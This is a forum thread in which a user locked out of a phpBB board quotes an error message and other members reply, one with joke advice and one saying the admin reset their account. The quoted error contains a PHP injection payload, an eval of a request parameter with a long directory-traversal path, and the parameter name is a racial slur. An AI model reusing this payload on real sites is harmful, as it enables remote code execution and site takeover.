Login Error

All things not relating to the other forums.
Twebba-temp

Login Error

Post by Twebba-temp »

Hi,

I hate doing this, but I had to create a bogus 'temp' account just to login and post this...

I did something silly and tried to change my preferences from using the "SubSilver" body style to the "FI Black" body style.

As soon as I did that, I got locked out of my forum account with the following PHP error:

-----{snip}-----
phpBB : Critical Error
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
DEBUG MODE
Line : 454
File : functions.php
-----{end snip}-----

I tried emailing Vince directly a while back to reset it, but received no response.

Does anyone know a way for me to undo this mistake?
(BTW - I get this error anytime I try to login now)

I certainly don't know any PHP code, but I'm assuming that the foul reference in line 2 of the error is referencing my choosing a black interface - probably some programmer's (or maybe that notorious hackers?) way of being cute.

I would just like to access the forum using my normal account.

Any guidance/suggestions are appreciated!

Thanks!

~TW~
Tony

Post by Tony »

This is your lucky day!

I just got off the phone with my good friend Bill G.

He had yet another question about problems with his current Lap Top hardware model Shiela.

I told him that Shiela had always been somewhat tempermental, and that the warm up phase can take longer than normal, especialy when Shiela is really really drunk.

Anyway, back to your problem, I am afraid the prognosis is not very promising.

The best and fastest solution would to hit enter/ no/data/ backconfigsys- 985448tjdgrfuigmuy.com/ jsugeyfkfhdtsjdsey.byen sjy/LSMFT.

If this solution doesn't work after the first few hundred attempts, try changing the tertiary code demod commands to Google: S and M Bondage.

This will take your mind off little troubles, because when your wife looks at your cookies, you will soon enter into a completely different realm of what worry is all about.

I hope this helps.
Twebba-temp

Post by Twebba-temp »

Thanks for the advice Tony.

I tried the
/ no/data/ backconfigsys- 985448tjdgrfuigmuy.com/ jsugeyfkfhdtsjdsey.byen sjy/LSMFT
command and received another ambiguous error that didn’t make much sense to my non-programmer mind.
I kept repeating it for about 2 hours in hopes that something would change – no luck.
When I ran your suggestion by a technical guru friend of mine, he thought it may not be working because of the spaces in the command. I tried it without spaces and nothing changed – I still can’t access my account.

The Google: S and M Bondage tertiary code demod changes didn’t work either.
Finally, I don’t bake, so I didn’t need to worry about getting into an argument with my wife over burnt cookies.

Someone else suggested I change my registry to include a flux-capacitor hyper-data transitory link.
I’ll give that a try as my last-ditch effort. BTW – Tell your friend Bill that he still owes me money and I’m tacking on interest.

If the registry thing doesn’t work, I guess I’ll just need to use this bogus account from now on. (Bummer eh?)
STPPINZ

Re: Login Error

Post by STPPINZ »

Twebba-temp wrote:Hi,

I hate doing this, but I had to create a bogus 'temp' account just to login and post this...

I did something silly and tried to change my preferences from using the "SubSilver" body style to the "FI Black" body style.

As soon as I did that, I got locked out of my forum account with the following PHP error:

-----{snip}-----
phpBB : Critical Error
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
DEBUG MODE
Line : 454
File : functions.php
-----{end snip}-----

I tried emailing Vince directly a while back to reset it, but received no response.

Does anyone know a way for me to undo this mistake?
(BTW - I get this error anytime I try to login now)

I certainly don't know any PHP code, but I'm assuming that the foul reference in line 2 of the error is referencing my choosing a black interface - probably some programmer's (or maybe that notorious hackers?) way of being cute.

I would just like to access the forum using my normal account.

Any guidance/suggestions are appreciated!

Thanks!

~TW~
I have dont the same thing and I had to get a hold of Vince. I think he had to reset the account or something but he got it to work again.
Wimps Need Not Apply
Twebba

Post by Twebba »

Fixed.

Vince, If you're reading this... Thanks for resetting my for my account!

:D

~ TW ~